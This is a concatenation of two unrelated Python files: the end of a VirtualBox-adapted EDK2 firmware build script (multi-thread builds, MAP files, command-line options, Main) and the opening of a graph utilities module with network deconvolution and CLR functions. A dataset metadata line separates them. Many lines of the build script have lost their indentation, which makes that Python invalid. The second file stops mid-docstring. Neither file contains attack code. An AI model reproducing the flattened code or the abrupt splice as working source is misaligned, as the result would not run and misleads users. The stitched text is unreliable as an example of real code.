for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa == None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser != None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None:
continue
# Not to auto-gen for targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
self.Progress.Stop("done!")
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption. we need a full version of makefile for platform
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
#
# Save temp tables to a TmpTableDict.
#
for Key in Wa.BuildDatabase._CACHE_:
if Wa.BuildDatabase._CACHE_[Key]._RawData and Wa.BuildDatabase._CACHE_[Key]._RawData._Table and Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table:
if TemporaryTablePattern.match(Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table):
TmpTableDict[Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table] = Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Cur
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
LaunchCommand(Wa.GenFdsCommand, os.getcwd())
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
    ## Generate GuidedSectionTools.txt in the FV directories.
    #
    def CreateGuidedSectionToolsFile(self):
        """Write a GuidedSectionTools.txt file into each existing FV directory.

        Each line maps a section GUID to the tool name and resolved tool path,
        gathered from *_GUID entries in the tools_def dictionary whose
        TARGET_TOOLCHAIN_ARCH prefix matches the current build combination.
        """
        for BuildTarget in self.BuildTargetList:
            for ToolChain in self.ToolChainList:
                Wa = WorkspaceAutoGen(
                        self.WorkspaceDir,
                        self.PlatformFile,
                        BuildTarget,
                        ToolChain,
                        self.ArchList,
                        self.BuildDatabase,
                        self.TargetTxt,
                        self.ToolDef,
                        self.Fdf,
                        self.FdList,
                        self.FvList,
                        self.CapList,
                        self.SkuId,
                        self.UniFlag
                        )
                FvDir = Wa.FvDir
                # Nothing to do when no FV output directory was produced.
                if not os.path.exists(FvDir):
                    continue
                for Arch in self.ArchList:
                    # Build up the list of supported architectures for this build
                    prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
                    # Look through the tool definitions for GUIDed tools
                    # NOTE(review): iteritems()/print >> below are Python 2 only.
                    guidAttribs = []
                    for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.iteritems():
                        if attrib.upper().endswith('_GUID'):
                            split = attrib.split('_')
                            thisPrefix = '_'.join(split[0:3]) + '_'
                            if thisPrefix == prefix:
                                guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
                                guid = guid.lower()
                                toolName = split[3]
                                path = '_'.join(split[0:4]) + '_PATH'
                                path = self.ToolDef.ToolsDefTxtDictionary[path]
                                path = self.GetFullPathOfTool(path)
                                guidAttribs.append((guid, toolName, path))
                    # Write out GuidedSecTools.txt
                    toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
                    toolsFile = open(toolsFile, 'wt')
                    for guidedSectionTool in guidAttribs:
                        print >> toolsFile, ' '.join(guidedSectionTool)
                    toolsFile.close()
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
self.Db.Close()
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
self.BuildModules = []
## Do some clean-up works when error occurred
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
#self.DumpBuildData()
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def DumpBuildData(self):
CacheDirectory = os.path.dirname(GlobalData.gDatabasePath)
Utils.CreateDirectory(CacheDirectory)
Utils.DataDump(Utils.gFileTimeStampCache, os.path.join(CacheDirectory, "gFileTimeStampCache"))
Utils.DataDump(Utils.gDependencyDatabase, os.path.join(CacheDirectory, "gDependencyDatabase"))
def RestoreBuildData(self):
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gFileTimeStampCache")
if Utils.gFileTimeStampCache == {} and os.path.isfile(FilePath):
Utils.gFileTimeStampCache = Utils.DataRestore(FilePath)
if Utils.gFileTimeStampCache == None:
Utils.gFileTimeStampCache = {}
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gDependencyDatabase")
if Utils.gDependencyDatabase == {} and os.path.isfile(FilePath):
Utils.gDependencyDatabase = Utils.DataRestore(FilePath)
if Utils.gDependencyDatabase == None:
Utils.gDependencyDatabase = {}
## Convert a list of "NAME[=VALUE]" macro definitions into a dictionary.
#
#   @param  DefineList  list of macro definition strings from the command
#                       line, or None when no -D options were given
#
#   @retval dict        macro name -> value; macros given without a value
#                       default to "TRUE"
#
def ParseDefines(DefineList=None):
    # Default is None rather than a mutable list literal: a shared mutable
    # default would be a latent bug if any caller ever appended to it.
    DefineDict = {}
    if DefineList is not None:
        for Define in DefineList:
            # Split on the first '=' only, so values may themselves contain '='.
            DefineTokenList = Define.split("=", 1)
            if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
                EdkLogger.error('build', FORMAT_INVALID,
                                "The macro name must be in the pattern [A-Z][A-Z0-9_]*",
                                ExtraData=DefineTokenList[0])
            if len(DefineTokenList) == 1:
                DefineDict[DefineTokenList[0]] = "TRUE"
            else:
                DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
    return DefineDict
# Options already seen on the command line; used to reject duplicates.
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
    """optparse callback that rejects a second occurrence of the same option."""
    if option in gParamCheck:
        parser.error("Option %s only allows one instance in command line!" % option)
    else:
        setattr(parser.values, option.dest, value)
        gParamCheck.append(option)
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
#   @retval Opt   A optparse.Values object containing the parsed options
#   @retval Args  Target of build command
#
def MyOptionParser():
    Parser = OptionParser(description=__copyright__,version=__version__,prog="build.exe",usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
    # --- Build scope selection: architecture, platform, module, target, toolchain ---
    Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32','X64','IPF','EBC','ARM', 'AARCH64'], dest="TargetArch",
        help="ARCHS is one of list: IA32, X64, IPF, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
    Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
        help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
    Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
        help="Build the module specified by the INF file name argument.")
    Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
                      action="append")
    Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
        help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
    Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
        help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
    Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
        help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. Less than 2 will disable multi-thread builds.")
    # --- Flash image (FDF/FD/FV/Capsule) options ---
    Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
        help="The name of the FDF file to use, which overrides the setting in the DSC file.")
    Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
        help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
    Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
        help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
    Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
        help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
    # --- Behaviour tweaks ---
    Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
    Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
    Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
    Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
    # --- Logging / verbosity ---
    Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
    Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
        help="Make use of silent mode of (n)make.")
    Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
    Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
                                                                             "including library instances selected, final dependency expression, "\
                                                                             "and warning messages, etc.")
    Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
    Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
    # --- Build report generation ---
    Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
    Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD','LIBRARY','FLASH','DEPEX','BUILD_FLAGS','FIXED_ADDRESS', 'EXECUTION_ORDER'], dest="ReportType", default=[],
        help="Flags that control the type of build report to generate.  Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, EXECUTION_ORDER].  "\
             "To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS]")
    Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
        help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
             "This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
             "will override the setting in [BuildOptions] section of platform DSC.")
    Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
    Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
    Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
    Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
    # VBox start
    # Allow overriding the target.txt location via option or environment.
    global gBuildConfiguration;
    TargetTxtFile = gBuildConfiguration;
    if 'VBOX_TARGET_CONF' in os.environ:
        TargetTxtFile = os.path.abspath(os.environ['VBOX_TARGET_CONF']);
    Parser.add_option("--vbox-target-conf", action="store", dest="VBoxTargetConf", default=TargetTxtFile,
                      help="Override %s location." % (gBuildConfiguration,), metavar="VBoxTargetConf")
    # VBox end
    (Opt, Args)=Parser.parse_args()
    # VBox start - again
    # Propagate a --vbox-target-conf override to child tools via the environment.
    if TargetTxtFile != Opt.VBoxTargetConf:
        gBuildConfiguration = os.path.abspath(Opt.VBoxTargetConf)
        os.environ['VBOX_TARGET_CONF'] = gBuildConfiguration # for the other tools.
    # VBox end
    return (Opt, Args)
## Tool entrance method
#
# This method mainly dispatch specific methods per the command line options.
# If no error found, return zero value so the caller of this tool can know
# if it's executed successfully or not.
#
#   @retval 0     Tool was successful
#   @retval 1     Tool failed
#
def Main():
    StartTime = time.time()
    # Initialize log system
    EdkLogger.Initialize()
    #
    # Parse the options and args
    #
    (Option, Target) = MyOptionParser()
    GlobalData.gOptions = Option
    GlobalData.gCaseInsensitive = Option.CaseInsensitive
    # Set log level
    if Option.verbose != None:
        EdkLogger.SetLevel(EdkLogger.VERBOSE)
    elif Option.quiet != None:
        EdkLogger.SetLevel(EdkLogger.QUIET)
    elif Option.debug != None:
        EdkLogger.SetLevel(Option.debug + 1)
    else:
        EdkLogger.SetLevel(EdkLogger.INFO)
    if Option.LogFile != None:
        EdkLogger.SetLogFile(Option.LogFile)
    if Option.WarningAsError == True:
        EdkLogger.SetWarningAsError()
    if platform.platform().find("Windows") >= 0:
        GlobalData.gIsWindows = True
    else:
        GlobalData.gIsWindows = False
    EdkLogger.quiet("Build environment: %s" % platform.platform())
    EdkLogger.quiet(time.strftime("Build start time: %H:%M:%S, %b.%d %Y\n", time.localtime()));
    ReturnCode = 0
    MyBuild = None
    try:
        # Exactly one build target is accepted; default is "all".
        if len(Target) == 0:
            Target = "all"
        elif len(Target) >= 2:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, "More than one targets are not supported.",
                            ExtraData="Please select one of: %s" %(' '.join(gSupportedTarget)))
        else:
            Target = Target[0].lower()
        if Target not in gSupportedTarget:
            EdkLogger.error("build", OPTION_NOT_SUPPORTED, "Not supported target [%s]." % Target,
                            ExtraData="Please select one of: %s" %(' '.join(gSupportedTarget)))
        #
        # Check environment variable: EDK_TOOLS_PATH, WORKSPACE, PATH
        #
        CheckEnvVariable()
        GlobalData.gCommandLineDefines.update(ParseDefines(Option.Macros))
        Workspace = os.getenv("WORKSPACE")
        #
        # Get files real name in workspace dir
        #
        GlobalData.gAllFiles = Utils.DirCache(Workspace)
        # With no -m option, a single INF file in the current directory selects a
        # module build implicitly; more than one INF is an error.
        WorkingDirectory = os.getcwd()
        if not Option.ModuleFile:
            FileList = glob.glob(os.path.normpath(os.path.join(WorkingDirectory, '*.inf')))
            FileNum = len(FileList)
            if FileNum >= 2:
                EdkLogger.error("build", OPTION_NOT_SUPPORTED, "There are %d INF files in %s." % (FileNum, WorkingDirectory),
                                ExtraData="Please use '-m <INF_FILE_PATH>' switch to choose one.")
            elif FileNum == 1:
                Option.ModuleFile = NormFile(FileList[0], Workspace)
        # Normalize module/platform/FDF paths relative to the workspace and validate them.
        if Option.ModuleFile:
            if os.path.isabs (Option.ModuleFile):
                if os.path.normcase (os.path.normpath(Option.ModuleFile)).find (Workspace) == 0:
                    Option.ModuleFile = NormFile(os.path.normpath(Option.ModuleFile), Workspace)
            Option.ModuleFile = PathClass(Option.ModuleFile, Workspace)
            ErrorCode, ErrorInfo = Option.ModuleFile.Validate(".inf", False)
            if ErrorCode != 0:
                EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
        if Option.PlatformFile != None:
            if os.path.isabs (Option.PlatformFile):
                if os.path.normcase (os.path.normpath(Option.PlatformFile)).find (Workspace) == 0:
                    Option.PlatformFile = NormFile(os.path.normpath(Option.PlatformFile), Workspace)
            Option.PlatformFile = PathClass(Option.PlatformFile, Workspace)
        if Option.FdfFile != None:
            if os.path.isabs (Option.FdfFile):
                if os.path.normcase (os.path.normpath(Option.FdfFile)).find (Workspace) == 0:
                    Option.FdfFile = NormFile(os.path.normpath(Option.FdfFile), Workspace)
            Option.FdfFile = PathClass(Option.FdfFile, Workspace)
            ErrorCode, ErrorInfo = Option.FdfFile.Validate(".fdf", False)
            if ErrorCode != 0:
                EdkLogger.error("build", ErrorCode, ExtraData=ErrorInfo)
        if Option.Flag != None and Option.Flag not in ['-c', '-s']:
            EdkLogger.error("build", OPTION_VALUE_INVALID, "UNI flag must be one of -c or -s")
        MyBuild = Build(Target, Workspace, Option)
        GlobalData.gCommandLineDefines['ARCH'] = ' '.join(MyBuild.ArchList)
        MyBuild.Launch()
        # Drop temp tables to avoid database locked.
        for TmpTableName in TmpTableDict:
            SqlCommand = """drop table IF EXISTS %s""" % TmpTableName
            TmpTableDict[TmpTableName].execute(SqlCommand)
        #MyBuild.DumpBuildData()
    # NOTE(review): the 'except E, X' syntax below is Python 2 only.
    except FatalError, X:
        if MyBuild != None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()
        if Option != None and Option.debug != None:
            EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        ReturnCode = X.args[0]
    except Warning, X:
        # error from Fdf parser
        if MyBuild != None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()
        if Option != None and Option.debug != None:
            EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        else:
            EdkLogger.error(X.ToolName, FORMAT_INVALID, File=X.FileName, Line=X.LineNumber, ExtraData=X.Message, RaiseError = False)
        ReturnCode = FORMAT_INVALID
    except KeyboardInterrupt:
        ReturnCode = ABORT_ERROR
        if Option != None and Option.debug != None:
            EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
    except:
        if MyBuild != None:
            # for multi-thread build exits safely
            MyBuild.Relinquish()
        # try to get the meta-file from the object causing exception
        Tb = sys.exc_info()[-1]
        MetaFile = GlobalData.gProcessingFile
        while Tb != None:
            if 'self' in Tb.tb_frame.f_locals and hasattr(Tb.tb_frame.f_locals['self'], 'MetaFile'):
                MetaFile = Tb.tb_frame.f_locals['self'].MetaFile
            Tb = Tb.tb_next
        EdkLogger.error(
                    "\nbuild",
                    CODE_ERROR,
                    "Unknown fatal error when processing [%s]" % MetaFile,
                    ExtraData="\n(Please send email to [email protected] for help, attaching following call stack trace!)\n",
                    RaiseError=False
                    )
        EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
        ReturnCode = CODE_ERROR
    finally:
        Utils.Progressor.Abort()
        Utils.ClearDuplicatedInf()
        if ReturnCode == 0:
            Conclusion = "Done"
        elif ReturnCode == ABORT_ERROR:
            Conclusion = "Aborted"
        else:
            Conclusion = "Failed"
        FinishTime = time.time()
        BuildDuration = time.gmtime(int(round(FinishTime - StartTime)))
        BuildDurationStr = ""
        # gmtime folds durations >= 24h into tm_yday, so report days separately.
        if BuildDuration.tm_yday > 1:
            BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration) + ", %d day(s)"%(BuildDuration.tm_yday - 1)
        else:
            BuildDurationStr = time.strftime("%H:%M:%S", BuildDuration)
        if MyBuild != None:
            MyBuild.BuildReport.GenerateReport(BuildDurationStr)
            MyBuild.Db.Close()
        EdkLogger.SetLevel(EdkLogger.QUIET)
        EdkLogger.quiet("\n- %s -" % Conclusion)
        EdkLogger.quiet(time.strftime("Build end time: %H:%M:%S, %b.%d %Y", time.localtime()))
        EdkLogger.quiet("Build total time: %s\n" % BuildDurationStr)
    return ReturnCode
# Script entry point: run the build and map the result to a process exit code.
if __name__ == '__main__':
    r = Main()
    ## 0-127 is a safe return range, and 1 is a standard default error
    if r < 0 or r > 127: r = 1
    sys.exit(r)
| {
"pile_set_name": "Github"
} |
"""Utilities for graph not included in Networkx.
.. MIT License
..
.. Copyright (c) 2018 Diviyan Kalainathan
..
.. Permission is hereby granted, free of charge, to any person obtaining a copy
.. of this software and associated documentation files (the "Software"), to deal
.. in the Software without restriction, including without limitation the rights
.. to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
.. copies of the Software, and to permit persons to whom the Software is
.. furnished to do so, subject to the following conditions:
..
.. The above copyright notice and this permission notice shall be included in all
.. copies or substantial portions of the Software.
..
.. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
.. IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
.. FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
.. AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
.. LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
.. OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
.. SOFTWARE.
"""
import networkx as nx
from copy import deepcopy
import operator
import numpy as np
import scipy.stats.mstats as stat
from numpy import linalg as LA
def network_deconvolution(mat, **kwargs):
    """Python implementation/translation of network deconvolution by MIT-KELLIS LAB.

    .. note::
       For networkx graphs, use the cdt.utils.graph.remove_indirect_links function

    code author:gidonro [Github username](https://github.com/gidonro/Network-Deconvolution)
    LICENSE: MIT-KELLIS LAB
    AUTHORS:
        Algorithm was programmed by Soheil Feizi.
        Paper authors are S. Feizi, D. Marbach, M. Médard and M. Kellis
        Python implementation: Gideon Rosenthal

    For more details, see the following paper:
        Network Deconvolution as a General Method to Distinguish
        Direct Dependencies over Networks
        By: Soheil Feizi, Daniel Marbach, Muriel Médard and Manolis Kellis
        Nature Biotechnology

    Args:
        mat (numpy.ndarray): matrix, if it is a square matrix, the program assumes
            it is a relevance matrix where mat(i,j) represents the similarity content
            between nodes i and j. Elements of matrix should be
            non-negative. NOTE: the diagonal is zeroed **in place**.
        beta (float): Scaling parameter, the program maps the largest absolute eigenvalue
            of the direct dependency matrix to beta. It should be
            between 0 and 1.
        alpha (float): fraction of edges of the observed dependency matrix to be kept in
            deconvolution process.
        control (int): if 0, displaying direct weights for observed
            interactions, if 1, displaying direct weights for both observed and
            non-observed interactions.

    Returns:
        numpy.ndarray: Output deconvolved matrix (direct dependency matrix). Its components
            represent direct edge weights of observed interactions.
            Choosing top direct interactions (a cut-off) depends on the application and
            is not implemented in this code.

    Raises:
        ValueError: if ``alpha`` is not in ]0, 1] or ``beta`` not in ]0, 1[.

    Example:
        >>> from cdt.utils.graph import network_deconvolution
        >>> import networkx as nx
        >>> # Generate sample data
        >>> from cdt.data import AcyclicGraphGenerator
        >>> graph = AcyclicGraphGenerator('linear').generate()[1]
        >>> adj_mat = nx.adjacency_matrix(graph).todense()
        >>> output = network_deconvolution(adj_mat)

    .. note::
       To apply ND on regulatory networks, follow steps explained in Supplementary notes
       1.4.1 and 2.1 and 2.3 of the paper.
       In this implementation, input matrices are made symmetric.
    """
    alpha = kwargs.get('alpha', 1)
    beta = kwargs.get('beta', 0.99)
    control = kwargs.get('control', 0)

    # Parameter validation. BUGFIX: the original used `assert beta < 1 or
    # beta > 0` (always true); the conjunction is what the docstring promises.
    if not 0 < beta < 1:
        raise ValueError("alpha must be in ]0, 1] and beta in ]0, 1[")
    if not 0 < alpha <= 1:
        raise ValueError("alpha must be in ]0, 1] and beta in ]0, 1[")

    # Processing the input matrix, diagonal values are filtered (in place).
    np.fill_diagonal(mat, 0)

    # Thresholding the input matrix: keep the top `alpha` fraction of edges.
    y = stat.mquantiles(mat[:], prob=[1 - alpha])
    th = mat >= y
    mat_th = mat * th

    # Making the matrix symmetric if already not
    mat_th = (mat_th + mat_th.T) / 2

    # Eigen decomposition
    Dv, U = LA.eigh(mat_th)
    D = np.diag(Dv)

    # Largest negative / positive eigenvalues, clamped at 0.
    # BUGFIX: the original called np.min(scalar, 0) / np.max(scalar, 0),
    # passing 0 as the *axis* argument (a MATLAB min(x,0) mistranslation);
    # scalar clamps via the builtins are what was intended.
    lam_n = np.abs(min(np.min(np.diag(D)), 0))
    lam_p = np.abs(max(np.max(np.diag(D)), 0))

    # Scaling factor so the extreme eigenvalue maps to beta.
    m1 = lam_p * (1 - beta) / beta
    m2 = lam_n * (1 + beta) / beta
    m = max(m1, m2)

    # network deconvolution: each eigenvalue d is rescaled to d / (m + d)
    for i in range(D.shape[0]):
        D[i, i] = (D[i, i]) / (m + D[i, i])
    mat_new1 = np.dot(U, np.dot(D, LA.inv(U)))

    # Displaying direct weights
    if control == 0:
        ind_edges = (mat_th > 0) * 1.0
        ind_nonedges = (mat_th == 0) * 1.0
        m1 = np.max(mat * ind_nonedges)
        m2 = np.min(mat_new1)
        # Scalar clamp (same axis-argument bugfix as above).
        mat_new2 = (mat_new1 + max(m1 - m2, 0)) * ind_edges + (mat * ind_nonedges)
    else:
        m2 = np.min(mat_new1)
        mat_new2 = (mat_new1 + max(-m2, 0))

    # linearly mapping the deconvolved matrix to be between 0 and 1
    m1 = np.min(mat_new2)
    m2 = np.max(mat_new2)
    mat_nd = (mat_new2 - m1) / (m2 - m1)
    return mat_nd
def clr(M, **kwargs):
    """Implementation of the Context Likelihood or Relatedness Network algorithm.

    .. note::
       For networkx graphs, use the cdt.utils.graph.remove_indirect_links function

    Args:
        M (numpy.ndarray): matrix, if it is a square matrix, the program assumes
            it is a relevance matrix where M(i,j) represents the similarity content
            between nodes i and j. Elements of matrix should be
            non-negative.

    Returns:
        numpy.ndarray: Output deconvolved matrix (direct dependency matrix). Its components
            represent direct edge weights of observed interactions.

    Example:
        >>> from cdt.utils.graph import clr
        >>> import networkx as nx
        >>> # Generate sample data
        >>> from cdt.data import AcyclicGraphGenerator
        >>> graph = AcyclicGraphGenerator('linear').generate()[1]
        >>> adj_mat = nx.adjacency_matrix(graph).todense()
        >>> output = clr(adj_mat)

    .. note::
       Ref:Jeremiah J. Faith, Boris Hayete, Joshua T. Thaden, Ilaria Mogno, Jamey
       Wierzbowski, Guillaume Cottarel, Simon Kasif, James J. Collins, and Timothy
